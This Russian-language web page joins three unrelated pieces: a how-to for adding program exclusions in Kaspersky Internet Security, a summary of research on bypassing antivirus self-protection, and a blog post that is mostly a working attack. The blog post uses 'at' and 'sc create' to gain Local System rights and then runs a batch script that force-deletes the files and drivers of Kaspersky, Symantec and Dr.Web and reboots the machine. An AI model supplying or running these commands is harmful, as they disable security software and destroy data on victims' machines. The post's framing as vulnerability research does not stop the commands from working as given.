C лучается , что широко – известный антивирус Касперского проявляет излишнюю осторожность и блокирует работу совершенно безобидных программ. Например , мне довелось столкнулся с тем , что Kaspersky Internet Security ( KIS ) не разрешает передавать файлы по встроенному в Total Commander FTP- клиенту.
К счастью , решить такую коллизию ( разрешить Касперскому не блокировать работу проверенных программ) довольно легко. Всё в том же Kaspersky Internet Security жмем на кнопку Дополнительные инструменты . :
Далее выбираем Дополнительно > Угрозы и исключения :
Угрозы и исключения" title="KIS – меню Дополнительно">
На следующей форме выбираем Настроить исключения :
Настроить исключения" title="KIS-Параметры угроз и исключений">
На форме ниже жмем на кнопку Добавить . :
. и выбираем выполняемый модуль программы, для исключения из проверки антивирусом ( TOTALCMD.exe для случая нашего примера):
Ну собственно и всё.
Теперь KIS не будет блокировать работу указанной программы.
В версии KIS 2016 (16.0.0.614) описанный механизм запуска доверенных программ реализован несколько иначе.
На Гл. форме выбираем Дополнительные инструменты :
Далее щелкаем слева по Режим Безопасных программ :
. и попадаем в форму генерации списка проверенных программ – тут нужно будет немного подождать :
В конце пути разрешаем нужные действия – например Total Commander‘ у передавать данные по ftp :
Д ругой банальной причиной того, что ваш любимый браузер вдруг перестал запускаться может быть выставленный в положение Запрещен переключатель Запуск :
Теперь попробуйте с такой настройкой загрузить все тот же Google Chrome – точно потерпите фиаско :
В общем, мораль ясна. Если появились проблемы при выходе в Сеть или не запускается новая программа – посмотрите внимательно настройки Антивируса Касперского (если он у вас установлен, понятное дело :-). Не исключено , что именно тут и зарыта собака .
Как с помощью Касперского скрыть следы работы на компьютере – смотрите информацию по этой ссылке
Если нужно срочно проверить устройство на вирусы , попробуйте бесплатную утилиту Kaspersky Virus Removal Tool
regist
гоняюсь за туманом
Как показывает практика, любой антивирус по дизайну уязвим, и реализовать очередной метод обхода в отношении него не является большой проблемой.
Нашему исследовательскому центру было интересно проверить, как разработчики антивирусных решений следят за наличием описаний методов атак на просторах интернета. И всегда ли для атаки на антивирус необходимо обнаружить в нем 0-day уязвимость или достаточно просто найти полезную информацию на форумах?
Введение
Большинство аналитических работ, посвященных этой теме, как правило, ориентировано на оценку эффективности детектирования вредоносного кода антивирусами, производительность работы антивирусов и т.д. Мы же в рамках своего исследования попытались выяснить, следят ли разработчики решений такого класса за тенденциями и модифицируют ли свои продукты в соответствии с новыми методами атак.
Самозащита антивируса и ее обход в ряде случаев означает обход всего механизма детектирования вредоносного кода. Этот причем часто используется при реализации целенаправленных атаках или в программах с деструктивным, блокирующим данное ПО функционалом.
После внедрения вредоносного кода внутрь процесса антивируса он способен долго и незаметно существовать в системе пользователя, что, несомненно, является следствием главного логического изъяна архитектуры самозащиты, равно как и методики использования доверенных списков процессов.
Самозащита антивируса
Вредоносный код совершенствуется параллельно с развитием антивирусных технологий, что очень похоже на некую гонку вооружений. Появляются все новые угрозы, которые компрометируют программное обеспечение этого класса, отключают его, полностью деактивируют его функционал и т.д. Как следствие, растут требования к разработке антивирусных решений, которые позиционируются для защиты постфактум. Антивирусы снабжают функционалом для самообороны и защиты от активных угроз. Развивается, пожалуй, самый спорный механизм ПО такого класса – механизм самозащиты.
Если систематизировать внутренне устройство нескольких антивирусных продуктов, можно обобщенно описать архитектуру самозащиты. В итоге, мы получим следующие признаки, свойственные данному механизму и его реализации:
- Защита собственных файлов и директорий
- Обычно реализована файловым фильтром уровня ядра.
- Защита собственных конфигурационных данных в реестре
- Реализуется при помощи совокупности перехватов и/или RegistryCallback-интерфейса ядра.
- Защита интерфейсов антивируса
- Контроль доступа к различным управляющим интерфейсам в ring0.
- Защита собственных процессов
- Реализации варьируются, это может быть совокупность различных перехватов системных функций ядра, типов объекта, использование callback’а на создание процесса.
И, наконец, самый спорный момент в работе механизма самозащиты: процессы антивируса становятся некой супер-привилегированной сущностью, они недоступны для воздействия как атакующего, так и обычного пользователя.
Последствия внедрения вредоносного кода в антивирус:
- Глобальное отключение/блокирование антивируса
- Манипулирование белыми списками
- Скрытое функционирование в супер-привилегированном процессе
- Обход правил межсетевого экрана
- …
Методология тестирования
Рассматриваемые антивирусные решения
Для проведения исследования мы отобрали несколько антивирусных продуктов, отвечающих следующим требованиям:
- ПО, использующее архитектуру самозащиты, заявляет о себе как о способном реагировать на активную, запущенную угрозу, обладает функцией проактивной защиты;
- Входит в список самых популярных решений, ранее трестировавшихся с применением различных методологий.
Получился такой список (На момент тестирования это были самые последние версии):
Тестирование методов проходило на операционной системе Windows 7, x86_64/x86_32, которая устанавливалась на виртуальной машине VMware. Кроме того, отдельные решения были инсталлированы на физическое железо (обусловлено использованием механизмов аппаратной виртуализации VT-x/AMD-V).
Для данного исследования было применено несколько универсальных техник, каждая из которых не нацелена на конкретное решение и не использует архитектурные слабости того или иного ПО.
Были выбраны такие техники, как: ProxyInject, Duplicate Handle, Reparse Point, PageFile, RegSafe/RegRestore и Shim Engine. За более подробным описание техник советуем обратится к оригинальному тексту исследования “Самозащита антивирусов”.
И для тестирования была использована специальная программа, которая получает на вход в качестве параметров данные о технике и цели.
Таким образом, результаты тестирования с определенной методологией на данной выборке техник выявили весьма интересный результат: отечественный антивирусный разработчик более качественно улучшал и строил свою оборону, нежели это делали иностранные вендоры.
Очевидно, некоторые компании попросту не отслеживают эволюцию публичных методов атак, лишь подтверждая тем самым абсурдность выбранной ими архитектуры.
Стоит также отметить, что, несмотря на все результаты, архитектура в целом не изменяется, и разработчики реагируют на произошедшие атаки постфактум и защищаются от уже известных механизмов атак. Это предоставляет злоумышленникам большую свободу действий, а также дает возможности для совершенствования методов в будущем. И пока ситуация не изменится, атакующие всегда будут на шаг впереди защиты.
Недавно мы уже обсудили могущество эвристических технологий современных антивирусов и пришли к мнению, что верить никому нельзя. Даже иногда себе 🙂
Сегодня мы поговорим о другом спорном моменте антивирусов — самозащите. Некоторые вендоры очень серьёзно относятся к этому моменту, и их продукты выстаивают даже в сложных комплексных случаях активного заражения, эффективно снимая вирусные перехваты, устанавливаясь в систему и даже в последующем удаляя уже изрядно прописавшихся зловредов. Другие считают, что активное заражение — это битва с ветряными мельницами, не приводящая ни к чему путному, а потому — LiveCD, а в ряде случаев и format c:
Отдадим должное обоим оппонентам: безусловно, если есть возможность победить вирусное противостояние — это хорошо. Если только это не приводит к бсодам и загрузке системы на пару-тройку дней. И абсолютно очевидно, что при серьёзном и комплексном заражении зачастую невозможно пробиться через активную массу перехватов, вредоносных процессов на уровне ядра и прочего — а потому часто действительно разумнее провести лечение неактивной системы (с LiveCD или сканируя винчестер на незаражённой машине), ну а в случае разношёрстной файловой инфекции — и задуматься о полной переустановке ОС.
Но не будем предаваться спорам — оставим это для следующей статьи 🙂 Поговорим о простом: о самозащите системы даже на заведомо незаражённой системе. И примем априори:
1) имеется комплексный продукт антивирус+хипс+файервол;
2) система была незаражена, но каким-то образом проник вредоносный код;
3) вредоносный код имеет своим намерением удалить антивирус или повредить его настолько, чтобы обеспечить полную неработоспособность.
Вариант действий будет самым простым — попытка удаления жизненно важных файлов антивируса с правами Local System. Идея такого подхода принадлежит моему хорошему другу Алексею Баранову, который сообщил о ней в закрытых кругах некоторое время назад. Время прошло, будем считать, что вендоры подтянулись — проверим это.
На Windows-системах, работая под администратором (а это, наверное, 80% всех систем) получить права Local System достаточно просто. В голову сразу приходит два способа, хорошо описанные в сети.
Способ 1. Использование планировщика.
По умолчанию, на всех Windows-системах работает служба планировщика задач. Эта служба запускает задачи с искомыми правами Local System. Тогда очень просто добавить задание как-то:
at 11:05 c:killer.bat
и kill.bat запустится с правами Local System.
Преимущества очевидны: всё просто и ясно. Недостаток: пользователь может заметить странную новую задачу в планировщике, да и просто в целях безопасности отключить эту службу.
Способ 1. Создание службы.
Суть метода заключается в создании службы, её запуске и удалении. При этом всё реализуется в три строчки:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem
При этом мало того, что killer.bat запустится с приоритетом IDLE, он ещё и будет запущен от имени Local System.
Метод незаметен, никак не проявляет себя.
На момент публикования статьи KIS 2010 оба метода пропускал на уровне хипса, даже не запрашивая никаких разрешений.
Ну а теперь перейдём к самому killer.bat (в нашем случае он расположен в корне на диске С, но понятно, что закинуть его можно куда угодно).
Суть этого файла проста: удаляем всё, что принадлежит антивирусу. Так, для Касперского 2010 это будет:
net stop srservice
erase /F /S /Q "C:Program FilesKaspersky LabKaspersky Internet Security 2010"
erase /F /S /Q "%windir%system32driverskl1.sys"
erase /F /S /Q "%windir%system32driversklif.sys"
erase /F /S /Q "%windir%system32driversklbg.sys"
erase /F /S /Q "%windir%system32driversklim5.sys"
erase /F /S /Q "%windir%system32driversklmd.sys"
erase /F /S /Q "%windir%system32driversklmouflt.sys"
shutdown -r -f -c "Bye-Bye. "
Для Symantec что-то типа (кто знает точнее — поправьте, сам-то я на Касперском):
net stop srservice
erase /F /S /Q "C:Program FilesSymantec"
erase /F /S /Q "C:Program FilesNorton Internet Security"
shutdown -r -f -c "Bye-Bye. "
Для Доктора Веба:
net stop srservice
erase /F /S /Q "C:Program FilesDrWeb"
erase /F /S /Q "%windir%system32driversdwprot.sys"
erase /F /S /Q "%windir%system32driversdrwebaf.sys"
erase /F /S /Q "%windir%system32driversDrWebPF.sys"
erase /F /S /Q "%windir%system32driversspiderg3.sys"
shutdown -r -f -c "Bye-Bye. "
Ну и так далее. В первой строчке идёт останов службы восстановления Windows — так, на всякий случай 🙂
Понятно, что аналогичный скрипт можно прописать для всех антивирусов — суть изменять пути к жизненно важным файлам.
Итого — что же мы имеем?
1. KIS 2010 получил такой урон, что был убит, и система осталась без защиты. KIS 2011 лишён этой половой слабости — но он же всё ещё бета…
2. NIS потерял несколько файлов, но работоспособность не нарушилась, файлы впоследствии были скачаны и восстановлены при обновлении из Интернет.
3. DrWeb вообще не пострадал, что и ожидалось, принимая во внимание особый упор разработчика на противостояние инфекции. Но не забываем, что для Веба есть SpiDie…
При этом хипсы указанных продуктов спокойно пропустили оба варианта манипуляций (КИС проверил лично).
ВЫВОДЫ
К сожалению, приходится констатировать факт, что некоторые из существующих антивирусных решений имеют ряд уязвимостей, которые могут быть использованы для повреждения защиты и фактически удалению антивируса с компьютера.
Предлагается в комментариях дополнить наблюдения и исследования по другим антивирусным продуктам (желательно с хипс, чтобы оценить и уровень блокировки действий по получению прав Local System). Думаю, что описанные манипуляции понятны и могут быть легко воспроизведены на виртуальных машинах энтузиастов.
Cheers! 
